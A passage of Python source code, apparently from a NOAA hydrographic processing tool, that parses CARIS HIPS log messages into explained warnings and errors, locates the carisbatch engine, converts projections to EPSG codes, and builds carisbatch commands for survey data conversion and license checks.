hdcsio_lnm, 'extent_stats': extent_stats} def parse_charlene_carislog(carislog): excludedwarnings = [['Static values used instead.', 28], ['Vessel settings used instead.', 30], ['Device model from vessel settings used instead.', 48]] # two chars for /n alreadywarned = [] alreadyerror = [] warningdict = {'Delayed heave was selected but no data was found': ['If you load delayed heave using pos options "Create ___ SBET" or ".000 Delayed Heave" Charlene', 'will attempt to check delayed heave at SVC and Merge. This warning probably came up because you have', 'MBES data that does not have POS files or is not covered by POS data, or POS import failed.'], 'The post-processed time extents do not entirely cover the line': ['Shows up during .000 import, you have MBES data that is not covered by POS data.', 'Double check that you have all your POS files selected in Charlene. Make sure you', 'start POS MV logging before you start the sonar and log POS MV for 5 minutes after MBES end.'], 'The post-processed data has gaps greater than the max allowed': ['Charlene by default will gaps up to 2 seconds on import. This message means you have a', 'gap greater than 2 seconds in your imported data. You can manually process to widen the', 'gap or reacquire/post process the POS data.'], 'The times of the records were outside the time range for the data': ['Caris will look at the times in the POS data and match them to times in the MBES data.', 'This message means that you have times that are in POS but not in MBES data. Generally not a concern.'], 'Post-processed data is not available for the line': ['When Caris imports from SBET (or .000), it matches times to the MBES data. This means that you have', 'MBES data that does not appear to have a matching SBET/.000. Not an issue if you load from multiple', "SBETs, as Charlene will just try each SBET with it's own Load SBET process and let Caris apply", "the SBET where it fits and pass where it does not. Just make sure that all lines have 'SBET_Loaded = Yes'", "Otherwise it is probably likely that you have the wrong SBETs (from an incorret day) or no SBETs at all."], 'Some transducer depths are above water': ['Generally not an issue. For Sound Velocity / beam steering, Caris uses the following to position the transducer:', ' - SVP (Z value), Heave/Pitch/Roll, HVF Waterline, Dynamic Draft', 'This warning means it ended up with the tranducer above the waterline at some point using these values', 'You will probably see fliers that have a negative z value in Subset Editor, these can just be cleaned out.'], 'No Svp was found for the specified time stamp': ['Using the method that you picked in Charlene (ex: Nearest in Distance in 4 Hours),', 'Caris was unable to find a cast that fits your MBES data. Probably either did not include', 'All of your SVP files or you have a line that is outside of 4 hours (if you picked that method)'], 'Input datum model does not completely cover survey data': ['You have a VDatum (or other separation model) that does not fully cover', 'all of your lines. You can see this by bringing in the VDatum csar in Caris to see', 'the overlap. You will probably need an additional area included in your', 'separation model. Please contact HSTB.'], 'Cannot georeference bathymetry for track lines': ['Georeference Bathymetry failed. Usually this is because it could not find', 'GPS Height. If you are loading SBETs, those probably failed, otherwise your', 'MBES files do not have GPS Height. Check the caris log for more details.'], 'TPU does not exist': ['This warning shows when you try to create a CUBE surface', '(Which requires uncertainty to generate) without having first', 'run Georeference Bathymetry. Or you attempted to run Georeference', 'Bathymetry and it failed.']} errordict = {'There is no GPS Height data available for this line.': ['This could be several things:,' ' - If you selected Create SBET, it most likely did not work and you have no SBET height loaded', ' - If you loaded SBET or .000 Height, it did not apply because of time stamp matching or something else', ' - If you relied on .all GGK height, it was not present', 'Look at your height source and make sure it exists and is coming from the right files'], 'No lines were successfully merged': ['This error shows when your Georeference Bathymetry process (which', 'includes merge) fails. Should have accompanying warnings that will', 'tell you why this process failed.'], 'No TPU found for any survey lines to process': ['Shows when you attempt to generate a CUBE surface without having successfully', 'run Georeferenced Bathymetry (which contains merge/tpu processing)', 'CUBE requires TPU to run, check the log to see why Georeference Bathy failed.'], 'Insufficient data provided for swath estimation': ['Usually seen when you pick the wrong projection. It searches for data', 'and is unable to find it because you chose the wrong UTM zone.'], 'There is no overlapping data for the surface': ['This is almost always because the line projection is either', 'completely wrong or the surface projection and the line', 'projection do not match. Check to see if your utm zone makes sense']} process_overview = {'Conversion': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_POSMV': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_SBET': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportHIPSFromAuxiliaryAPP_RMS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ImportTideToHIPS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'TCARI': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': [], 'count': 0}, 'GeoreferenceHIPSBathymetry': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'SoundVelocityCorrectHIPSWithCARIS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeHIPSGPSTide': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'MergeHIPS': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeHIPSTPU': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateHIPSGrid': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateSIPSBeamPattern': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'ComputeSIPSTowfishNavigation': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}, 'CreateSIPSMosaic': {'start': '', 'end': '', 'warning': [], 'warn_explain': [], 'error': [], 'error_explain': []}} activeproc = '' sbetproc = False with open(carislog, 'r') as carislogfile: carislines = carislogfile.readlines() for l in carislines: if l[0:20] == '*******Running TCARI': process_overview['TCARI']['start'] = l.rstrip() activeproc = 'TCARI' elif l[0:12] == '*******TCARI': process_overview['TCARI']['end'] = l.rstrip() activeproc = 'TCARI' elif activeproc == 'TCARI' and l[0:23] == '^^^ End tide processing': process_overview['TCARI']['count'] += 1 elif l[0:6] == '======': rawmsg = l.split(':')[0][7:] savemsg = l[7:len(l) - 8] if rawmsg in ['Hypack RAW, HSX start', 'Kongsberg ALL start', 'Teledyne S7K start', 'Klein SDF start', 'Edgetech JSF start']: process_overview['Conversion']['start'] = savemsg activeproc = 'Conversion' elif rawmsg in ['Hypack RAW, HSX end', 'Kongsberg ALL end', 'Teledyne S7K end', 'Klein SDF end', 'Edgetech JSF end']: process_overview['Conversion']['end'] = savemsg activeproc = 'Conversion' elif rawmsg == 'Import HIPS From Applanix POS MV start': process_overview['ImportHIPSFromAuxiliaryAPP_POSMV']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_POSMV' elif rawmsg == 'Import HIPS From Applanix POS MV end': process_overview['ImportHIPSFromAuxiliaryAPP_POSMV']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_POSMV' elif rawmsg == 'Import HIPS From Applanix SBET start': process_overview['ImportHIPSFromAuxiliaryAPP_SBET']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_SBET' elif rawmsg == 'Import HIPS From Applanix SBET end': process_overview['ImportHIPSFromAuxiliaryAPP_SBET']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_SBET' elif rawmsg == 'Import HIPS From Applanix RMS start': process_overview['ImportHIPSFromAuxiliaryAPP_RMS']['start'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_RMS' elif rawmsg == 'Import HIPS From Applanix RMS end': process_overview['ImportHIPSFromAuxiliaryAPP_RMS']['end'] = savemsg activeproc = 'ImportHIPSFromAuxiliaryAPP_RMS' elif rawmsg == 'Import Tide to HIPS start': process_overview['ImportTideToHIPS']['start'] = savemsg activeproc = 'ImportTideToHIPS' elif rawmsg == 'Import Tide to HIPS end': process_overview['ImportTideToHIPS']['end'] = savemsg activeproc = 'ImportTideToHIPS' elif rawmsg == 'Georeference Bathymetry start': process_overview['GeoreferenceHIPSBathymetry']['start'] = savemsg activeproc = 'GeoreferenceHIPSBathymetry' elif rawmsg == 'Georeference Bathymetry end': process_overview['GeoreferenceHIPSBathymetry']['end'] = savemsg activeproc = 'GeoreferenceHIPSBathymetry' elif rawmsg == 'Sound Velocity Correct using CARIS Algorithm start': process_overview['SoundVelocityCorrectHIPSWithCARIS']['start'] = savemsg activeproc = 'SoundVelocityCorrectHIPSWithCARIS' elif rawmsg == 'Sound Velocity Correct using CARIS Algorithm end': process_overview['SoundVelocityCorrectHIPSWithCARIS']['end'] = savemsg activeproc = 'SoundVelocityCorrectHIPSWithCARIS' elif rawmsg == 'Compute HIPS GPS Tide start': process_overview['ComputeHIPSGPSTide']['start'] = savemsg activeproc = 'ComputeHIPSGPSTide' elif rawmsg == 'Compute HIPS GPS Tide end': process_overview['ComputeHIPSGPSTide']['end'] = savemsg activeproc = 'ComputeHIPSGPSTide' elif rawmsg == 'Merge HIPS start': process_overview['MergeHIPS']['start'] = savemsg activeproc = 'MergeHIPS' elif rawmsg == 'Merge HIPS end': process_overview['MergeHIPS']['end'] = savemsg activeproc = 'MergeHIPS' elif rawmsg == 'Compute HIPS TPU start': process_overview['ComputeHIPSTPU']['start'] = savemsg activeproc = 'ComputeHIPSTPU' elif rawmsg == 'Compute HIPS TPU end': process_overview['ComputeHIPSTPU']['end'] = savemsg activeproc = 'ComputeHIPSTPU' elif rawmsg == 'Create HIPS Grid using CUBE start': process_overview['CreateHIPSGrid']['start'] = savemsg activeproc = 'CreateHIPSGrid' elif rawmsg == 'Create HIPS Grid using CUBE end': process_overview['CreateHIPSGrid']['end'] = savemsg activeproc = 'CreateHIPSGrid' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan start': process_overview['CreateSIPSBeamPattern']['start'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan end': process_overview['CreateSIPSBeamPattern']['end'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan start': process_overview['CreateSIPSBeamPattern']['start'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Create SIPS Beam Pattern using Side Scan end': process_overview['CreateSIPSBeamPattern']['end'] = savemsg activeproc = 'CreateSIPSBeamPattern' elif rawmsg == 'Compute SIPS Towfish Navigation start': process_overview['ComputeSIPSTowfishNavigation']['start'] = savemsg activeproc = 'ComputeSIPSTowfishNavigation' elif rawmsg == 'Compute SIPS Towfish Navigation end': process_overview['ComputeSIPSTowfishNavigation']['end'] = savemsg activeproc = 'ComputeSIPSTowfishNavigation' elif rawmsg == 'Create SIPS Mosaic using SIPS Side Scan start': process_overview['CreateSIPSMosaic']['start'] = savemsg activeproc = 'CreateSIPSMosaic' elif rawmsg == 'Create SIPS Mosaic using SIPS Side Scan end': process_overview['CreateSIPSMosaic']['end'] = savemsg activeproc = 'CreateSIPSMosaic' elif l[0:7].lower() == 'warning': skip = False for ex in excludedwarnings: if l[len(l) - ex[1]:].rstrip() == ex[0]: skip = True if not skip: process_overview[activeproc]['warning'].append(l.rstrip()) for warn in warningdict: if (l.find(warn) != -1) and (warn not in alreadywarned): alreadywarned.append(warn) process_overview[activeproc]['warn_explain'].append([warn, warningdict[warn]]) elif l[0:5].lower() == 'error': process_overview[activeproc]['error'].append(l.rstrip()) for err in errordict: if (l.find(err) != -1) and (err not in alreadyerror): alreadyerror.append(err) process_overview[activeproc]['error_explain'].append([err, errordict[err]]) elif l[0:7] == 'POSMV: ': if l.find('SBET') != -1: sbetproc = True return process_overview, sbetproc def support_files_finder(command, suppress_exception=True): cubeparams = '' depth_coverage = '' depth_object = '' if command.startswith('"') and command.endswith('"'): command = command[1:-1] sys_dir = os.path.join(os.path.dirname(os.path.dirname(command)), 'system') xmlfiles = glob.glob(os.path.join(sys_dir, '*.xml')) txtfiles = glob.glob(os.path.join(sys_dir, '*.txt')) valid_cubeparams = ['CUBEParams_NOAA_2019.xml', 'CUBEParams_NOAA_2018.xml', 'CUBEParams_NOAA_2017.xml'] valid_depth_cc = ['NOAA_DepthRanges_CompleteCoverage_2019.txt', 'NOAA_DepthRanges_CompleteCoverage_2018.txt', 'NOAA_DepthRanges_CompleteCoverage_2017.txt'] valid_depth_obj = ['NOAA_DepthRanges_ObjectDetection_2019.txt', 'NOAA_DepthRanges_ObjectDetection_2018.txt', 'NOAA_DepthRanges_ObjectDetection_2017.txt'] for cbparams in valid_cubeparams: fullcb = os.path.join(sys_dir, cbparams) if fullcb in xmlfiles: cubeparams = fullcb break for depthcc in valid_depth_cc: fullcc = os.path.join(sys_dir, depthcc) if fullcc in txtfiles: depth_coverage = fullcc break for depthdo in valid_depth_obj: fulldo = os.path.join(sys_dir, depthdo) if fulldo in txtfiles: depth_object = fulldo break if cubeparams and depth_coverage and depth_object: return cubeparams, depth_coverage, depth_object else: if not suppress_exception: mess = "Caris Support Files not found at {}".format(sys_dir) raise Exception(mess) else: return cubeparams, depth_coverage, depth_object def command_finder_old(): # carisbatch finder, in case you installed somewhere dumb or don't have it installed at all name = 'carisbatch.exe' command = '' batch_engine = '' pathlist = [r'C:\Program Files\CARIS\HIPS and SIPS\10.4', r'C:\Program Files\CARIS\HIPS and SIPS\10.3', r'C:\Program Files\CARIS\HIPS and SIPS\10.2'] for path in pathlist: if os.path.exists(path): for root, dirs, files in os.walk(path, topdown=True): if name in files: batch_engine = os.path.join(root, name) break break if batch_engine: command = '"' + batch_engine + '"' else: raise Exception("No Batch Engine found...is CARIS installed at C:\Program Files\CARIS\HIPS and SIPS?") return command def caris_command_finder(exe_name, accepted_versions, app_key): batch_engine = '' vers = '' regHKLM = ConnectRegistry(None, HKEY_LOCAL_MACHINE) for vHIPS in accepted_versions: try: kBDB = OpenKey(regHKLM, os.sep.join(('SOFTWARE', 'CARIS', 'HIPS', vHIPS, 'Environment Variables'))) p2hipsinst = QueryValueEx(kBDB, "install_dir")[0] batch_engine = os.path.join(p2hipsinst, 'bin', exe_name) # if the carisbatch doesn't exist then continue to the next version of caris if not os.path.exists(batch_engine): continue vers = float(vHIPS) break except WindowsError: continue return batch_engine, vers def command_finder_hips(): batch_engine, vers = caris_command_finder('carisbatch.exe', ('11.2', '11.1', '10.4', '10.3', '10.2'), "HIPS") if not batch_engine: raise Exception("No Batch Engine found...is CARIS HIPS and SIPS installed?") return batch_engine, vers def command_finder_base(): batch_engine, vers = caris_command_finder('carisbatch.exe', ('5.3', '5.2', '5.1', '4.4', '4.3', '4.2'), 'BASE Editor') if not batch_engine: raise Exception("No Batch Engine found...is CARIS BASE Editor installed?") return batch_engine, vers def get_bands_from_csar(path_to_csar): """ Open a csar file and return the bands. Returns a list. For a sounding csar probably like this: ['Depth', 'Deep', 'Density', 'Hypothesis_Count', 'Hypothesis_Strength', 'Mean', 'Node_Std_Dev', 'Shoal', 'Std_Dev', 'Uncertainty', 'User_Nominated'] For a sidescan csar then something like this: ['Intensity', 'Density', 'Standard_Deviation', 'Weights'] """ grids = GridsManager() grids.add_path(path_to_csar) list(grids.grid_list) grids.set_current(path_to_csar) DEFAULT_CHUNK_SIZE = 1073741824 # 1GB 4294967296 # 4GB grids.open_to_read_current(DEFAULT_CHUNK_SIZE) return list(grids.layer_names()) def find_csar_band_name(csar, log=None): if os.path.splitext(csar)[1] == '.csar': # c = hydroffice.csar.raw.csar.CsarBase() band_names = get_bands_from_csar(csar) out = '' b = '' found = False out = 'Searching for VDatum bands "NAD83_MLLW" and "WGS84_MLLW"\n' for b in band_names: if b in ['NAD83-MLLW', 'WGS84-MLLW', 'NAD83_MLLW', 'WGS84_MLLW']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for other NAD83/WGS84 prefixed band names\n' for b in band_names: if b[0:6] in ['NAD83_', 'WGS84_']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for VDatum bands "Elevation", "Datum Height" and "Height"\n' for b in band_names: if b in ['Datum Height', 'Elevation', 'Height']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Searching for VDatum bands "Depth"\n' for b in band_names: if b in ['Depth']: out += 'found VDatum band {}'.format(b) found = True break if not found: out += 'Could not find expected VDatum band. Need NAD83-MLLW, WGS84-MLLW, Elevation, Height or Datum Height.\n' out += 'Found {}'.format(band_names) b = '' if log: with open(log, 'a+') as logger: print(out, file=logger) print(out) return b elif os.path.splitext(csar)[1] == '.asc': if log: with open(log, 'a+') as logger: print("Found .asc file: using 'Band 1' band name", file=logger) print("Found .asc file: using 'Band 1' band name") return 'Band 1' else: if log: with open(log, 'a+') as logger: print("File format unsupported: Require .asc or .csar file", file=logger) print("File format unsupported: Require .asc or .csar file") return '' def proj_to_epsg(coord, proj): if coord == 'NAD83': zone = proj[9:len(proj) - 1] if len(zone) == 2: return '269' + zone elif len(zone) == 1: return '2690' + zone else: raise IOError('Invalid projection: {}, {}'.format(coord, proj)) elif coord == 'WGS84': zone = proj[9:len(proj) - 1] if len(zone) == 2: return '326' + zone elif len(zone) == 1: return '3260' + zone else: raise IOError('Invalid projection: {}, {}'.format(coord, proj)) else: raise IOError('Invalid coordinate system: {}'.format(coord)) def wgs84_epsg_utmzone_finder(maxlon, minlon): maxlon = int(maxlon) minlon = int(minlon) msg = '' maxlon_zone = str(30 - ((int(maxlon) * -1) / 6)) if len(str(maxlon_zone)) == 1: maxlon_zone = '3260' + str(maxlon_zone) else: maxlon_zone = '326' + str(maxlon_zone) minlon_zone = str(30 - ((int(minlon) * -1) / 6)) if len(str(minlon_zone)) == 1: minlon_zone = '3260' + str(minlon_zone) else: minlon_zone = '326' + str(minlon_zone) if int(maxlon_zone) != int(minlon_zone): msg = 'Spanning more than one UTM zone: {}, {}'.format(minlon_zone, maxlon_zone) return maxlon_zone, msg def nad83_epsg_utmzone_finder(maxlon, minlon): maxlon = int(maxlon) minlon = int(minlon) msg = '' maxlon_zone = str(30 - ((int(maxlon) * -1) / 6)) if len(str(maxlon_zone)) == 1: maxlon_zone = '2690' + str(maxlon_zone) else: maxlon_zone = '269' + str(maxlon_zone) minlon_zone = str(30 - ((int(minlon) * -1) / 6)) if len(str(minlon_zone)) == 1: minlon_zone = '2690' + str(minlon_zone) else: minlon_zone = '269' + str(minlon_zone) if int(maxlon_zone) != int(minlon_zone): msg = 'Spanning more than one UTM zone: {}, {}'.format(minlon_zone, maxlon_zone) return maxlon_zone, msg def proj_from_svp(svp_path): if svp_path.endswith(".svp"): with open(svp_path, 'r') as svp: version = svp.readline() name = svp.readline() header = svp.readline() try: section, date, lat, int = [header.split()[i] for i in [1, 2, 3, 4]] except: error = 'Error reading {}\n'.format(svp_path) error += 'Please verify that the svp file has the correct header' raise IOError(error) degree_long = int.split(':')[0] lon_zone = str(30 - ((int(degree_long) * -1) / 6)) if lat[0] == '-': return 'UTM Zone ' + lon_zone + 'S' return 'UTM Zone ' + lon_zone + 'N' else: return '' # helper function to retrieve the path to the NOAA folder in PydroXL def retrieve_noaa_folder_path(): folder_path = HSTB.resources.path_to_HSTB() if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "NOAA folder: {}".format(folder_path) return folder_path # helper function to retrieve the install prefix path for PydroXL def retrieve_install_prefix(): folder_path = HSTB.resources.path_to_root_env() if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "install prefix: %s" % folder_path return folder_path # helper function to retrieve the path to the "Scripts" folder in PydroXL def retrieve_scripts_folder(): folder_path = HSTB.resources.path_to_root_env("Scripts") if not os.path.exists(folder_path): raise RuntimeError("the folder does not exist: %s" % folder_path) # print "scripts folder: %s" % folder_path return folder_path # helper function to retrieve the path to the "activate.bat" batch file in PydroXL def retrieve_activate_batch(): scripts_prefix = retrieve_scripts_folder() file_path = os.path.realpath(os.path.join(scripts_prefix, "activate.bat")) if not os.path.exists(file_path): raise RuntimeError("the file does not exist: %s" % file_path) # print "activate batch file: %s" % file_path return file_path class CarisAPI(): def __init__(self, processtype='', hdcs_folder='', hvf='', project_name='', sheet_name='', vessel_name='', day_num='', input_format='', logger=os.path.join(os.path.dirname(__file__), 'log.txt'), benchcsv='', coord_mode='', proj_mode='', noaa_support_files=False, benchfrom='', benchto='', benchtoraw='', bench=True, progressbar=None, base=False, hipsips=True): self.benchclass = benchmark.Benchmark(benchfrom, benchto, benchtoraw) self.benchfrom = benchfrom self.benchto = benchto self.benchtoraw = benchtoraw self.progressbar = progressbar self.processtype = processtype self.hdcs_folder = hdcs_folder self.hvf = hvf self.project_name = project_name self.sheet_name = sheet_name self.vessel_name = vessel_name self.day_num = day_num self.onlysurface_additionalvessel = '' self.noaa_support_files = noaa_support_files if hipsips: self.hipscommand, self.hipsversion = command_finder_hips() self.hdcsio_read = hdcsio_read() if self.noaa_support_files: self.cubeparams, self.depth_coverage, self.depth_object = support_files_finder(self.hipscommand) else: self.hipscommand, self.hipsversion = '', '' if base: self.basecommand, self.baseversion = command_finder_base() else: self.basecommand, self.baseversion = '', '' self.bathy_type = 'MULTIBEAM' self.input_format = input_format self.logger = logger self.bench = bench self.benchcsv = benchcsv self.converted_lines = [] self.coord = coord_mode self.proj = proj_mode self.proj_to_epsg = proj_to_epsg self.totalmiles = '' self.starttime = '' self.endtime = '' self.totaltime = '' def enqueue_output(self, out, queue): for line in iter(out.readline, ''): queue.put(line) out.close() def run_this_old_old(self, fullcommand): p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) while p.poll() is None: if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') for line in iter(p.stdout.readline, b''): print((">>> " + line.rstrip())) def run_this(self, fullcommand): with open(self.logger, 'a+') as log: # log.write(fullcommand) p = subprocess.Popen(fullcommand, stdout=log, stderr=log) while p.poll() is None: if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') time.sleep(.1) def run_this_old_old_old_old(self, fullcommand): log = open(self.logger, 'a+') log.write(fullcommand) templog = open('templog.txt', 'wb') p = subprocess.Popen(fullcommand, stdout=templog, stderr=subprocess.STDOUT) readtemp = open('templog.txt', 'r') while p.poll() is None: if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') t = readtemp.read() if t: print(t) log.write(t) time.sleep(.1) t = readtemp.read() if t: print(t) log.write(t) readtemp.close() templog.close() os.remove('templog.txt') def run_this_old(self, fullcommand): p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True) output, errors = p.communicate() log = open(self.logger, 'a+') print(output) print(output, file=log) print(errors) print(errors, file=log) def run_this_old_old_old(self, fullcommand): log = open(self.logger, 'w+') p = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, close_fds=ON_POSIX) q = Queue() t = threading.Thread(target=self.enqueue_output, args=(p.stdout, q)) # t.daemon() t.start() while t.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Caris Processes') try: line = q.get(timeout=.1) except Empty: pass else: print(line, end=' ') print(line, end=' ', file=log) def caris_hips_license_check(self, printout=True): fullcommand = self.hipscommand + ' --version' test = -1 out = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out = out.stdout.read() out = out.splitlines() # first stage: Just see if the modules are enabled, will at least see if they configured Caris to run if printout: if self.logger is not None: if not os.path.exists(os.path.split(self.logger)[0]): os.makedirs(os.path.split(self.logger)[0]) with open(self.logger, 'a+') as log: print('\n'.join(out)) print('\n'.join(out), file=log) print('\n****************************************************\n') print('\n****************************************************\n', file=log) else: out.append('\nUnable to access log file: {}\n'.format(self.logger)) for line in out: if line[:4] == 'HIPS': test = line.find('Yes') break if test == -1: return False, out else: # second stage: Try to write a csar to see if you are licensed car = CarisAPI(bench=False) tstsrc = os.path.join(charlene_test_folder, 'tstraster.csar') desttif = os.path.join(charlene_test_folder, 'delete_me.tif') if os.path.exists(desttif): os.remove(desttif) car.export_raster(tstsrc, 'GeoTIFF', desttif) if os.path.exists(desttif): os.remove(desttif) return True, out else: out = ['License check failed: Ensure that modules are enabled in Caris and a valid license is activated.'] return False, out def caris_base_license_check(self, printout=True): # if not already enabled, enable base if not self.basecommand: self.basecommand, self.baseversion = command_finder_base() if not self.basecommand: out = 'License check failed: Base switch not set in CarisAPI and no valid Base Editor command found.' return False, out fullcommand = self.basecommand + ' --version' test = -1 out = subprocess.Popen(fullcommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) out = out.stdout.read() out = out.splitlines() # first stage: Just see if the modules are enabled, will at least see if they configured Caris to run if printout: if self.logger is not None: if not os.path.exists(os.path.split(self.logger)[0]): os.makedirs(os.path.split(self.logger)[0]) with open(self.logger, 'a+') as log: print('\n'.join(out)) print('\n'.join(out), file=log) print('\n****************************************************\n') print('\n****************************************************\n', file=log) else: out.append('\nUnable to access log file: {}\n'.format(self.logger)) for line in out: if line[:15] == 'Feature Editing': test = line.find('Yes') break # They changed the fucking name to 'BASE Editor', of course, in 5.3 the jerks elif line[:11] == 'BASE Editor': test = line.find('Yes') break if test == -1: return False, out else: # second stage: Try to write a csar to see if you are licensed car = CarisAPI(bench=False, base=True, hipsips=False) tstsrc = os.path.join(charlene_test_folder, 'tstraster.csar') desttif = os.path.join(charlene_test_folder, 'delete_me.tif') if os.path.exists(desttif): os.remove(desttif) car.export_raster(tstsrc, 'GeoTIFF', desttif, forcebase=True) if os.path.exists(desttif): os.remove(desttif) return True, out else: print(out) out = ['License check failed: Ensure that modules are enabled in Caris and a valid license is activated.'] return False, out def processlog_read(self, transferstats, options): if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) # querybyline not supported, don't use the converted_lines stuff convlines = [] else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) convlines = self.converted_lines #history_dict, process_history, self.starttime, self.endtime, self.totaltime, self.totalmiles, data, hdcsio_lnm, extent_stats = read_stats_from_hdcs(hdcspath) hdcsstats = read_stats_from_hdcs(hdcspath, self.hipsversion) if hdcsstats: self.starttime = hdcsstats['starttime'] self.endtime = hdcsstats['endtime'] self.totaltime = hdcsstats['totaltime'] self.totalmiles = hdcsstats['totalmiles'] hips = os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') thr = threading.Thread(target=processing_report.process_reader, args=(self.processtype, hdcsstats['history_dict'], self.starttime, self.endtime, self.totaltime, self.totalmiles, hdcsstats['extent_stats'], self.project_name, self.sheet_name, self.vessel_name, self.day_num, self.logger, transferstats, hdcspath, hips, options['acqcomments'], self.hipsversion, convlines)) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Generating Log...') time.sleep(.1) carislog_summary, sbetproc = parse_charlene_carislog(options['carislogger']) thr = threading.Thread(target=processing_report.end_status_report, args=(self.processtype, hdcsstats['history_dict'], self.vessel_name, self.day_num, self.logger, transferstats, hdcspath, hips, carislog_summary, sbetproc, self.hipsversion, convlines)) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Generating Status Report...') time.sleep(.1) def create_new_hips_project(self): hipsfile = os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') epsg = proj_to_epsg(self.coord, self.proj) if not os.path.exists(hipsfile): fullcommand = self.hipscommand + ' --run CreateHIPSFile --output-crs EPSG:' + epsg + ' "' + hipsfile + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def convert_mbes(self, raw_file, kongs_height='EM_HEIGHT', overwrite=False): '''Runs ImporttoHIPS with all options. Example: carisbatch.exe --run ImportToHIPS --input-format HYPACK --convert-bathymetry MULTIBEAM C:\HIPSData\PreProcess\000_1111.HSX file:///C:/HIPSData/HDCS_Data/Test/ Test.hips?Vessel=HypackVessel2017;Day=2017-006''' rawfiles = '' epsg = proj_to_epsg(self.coord, self.proj) if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) for line in raw_file: rawfiles += '"' + line + '" ' tempraw = os.path.split(line)[1] line_path = os.path.join(hdcspath, tempraw[:len(tempraw) - 4]) self.converted_lines.append(line_path) fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format ' + self.input_format fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite BATHY --overwrite NAVIGATION --overwrite MOTION' if self.input_format == 'HYPACK': fullcommand += ' --convert-bathymetry ' + self.bathy_type + ' ' + rawfiles elif self.input_format == 'KONGSBERG': fullcommand += ' --convert-navigation --gps-height-device ' + kongs_height + ' ' + rawfiles elif self.input_format == 'TELEDYNE_7k': fullcommand += ' --navigation-device POSITION --heading-device HEADING --motion-device RPH' fullcommand += ' --swath-device BATHYMETRY ' + rawfiles elif self.input_format == 'GSF': fullcommand += ' --depth-source TRUE ' + rawfiles fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') if self.hipsversion < 11: fullcommand += '?Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' else: fullcommand += '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def daynum_extents(self, epsg, overwritelines=[]): lat = [] lon = [] msg = '' if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) if self.converted_lines == []: for folder in os.listdir(hdcspath): line_path = os.path.join(hdcspath, folder) if os.path.isdir(line_path): self.converted_lines.append(line_path) if overwritelines: # keep only converted lines that match raw data (overwritelines is raw data, converted_lines are hdcs) keep_lines = [] for procline in self.converted_lines: procfolder = os.path.split(procline)[1] for rawfile in overwritelines: rawfilename = 